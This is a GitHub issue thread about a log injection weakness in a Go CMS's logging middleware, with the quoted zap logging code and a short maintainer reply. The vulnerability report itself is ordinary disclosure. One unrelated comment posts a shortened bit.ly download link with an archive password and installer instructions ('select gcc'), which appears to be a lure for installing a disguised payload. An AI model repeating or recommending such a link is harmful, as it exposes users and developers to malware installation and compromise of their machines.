### ISSUE TITLE
Improper Output Neutralization for Logs in	middleware/log.go

### ISSUE THREAD

**Issue by gtqbhksl** [master-nan/sweet-cms#3]
Cause of vulnerability: In lines 58-62 of the file 'middleware/log.go', the log entry relies on a user-supplied value (' c.reequest '). If the values provided by the user contain special characters or malicious code, these values may be logged directly into the log, resulting in log injection attacks. Attackers may manipulate the content of logs by submitting specific requests, which may lead to security issues such as leakage of sensitive information and misuse of log files. This is a typical log injection vulnerability.

middleware/log.go line 57-65

```
		zap.L().Info("用户访问日志:",
			zap.String("uri", c.Request.URL.Path),
			zap.String("method", c.Request.Method),
			zap.Any("query", c.Request.URL.Query()),
			zap.Any("body", c.Request.Body),
			zap.Any("response", responseBody),
			zap.String("ip", c.ClientIP()),
			zap.String("duration", fmt.Sprintf("%.4f seconds", duration.Seconds())))
		zap.L().Info("Access Log end")
```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by master-nan** [comment]
thx,I processed it in the 'middleware/log. go' file
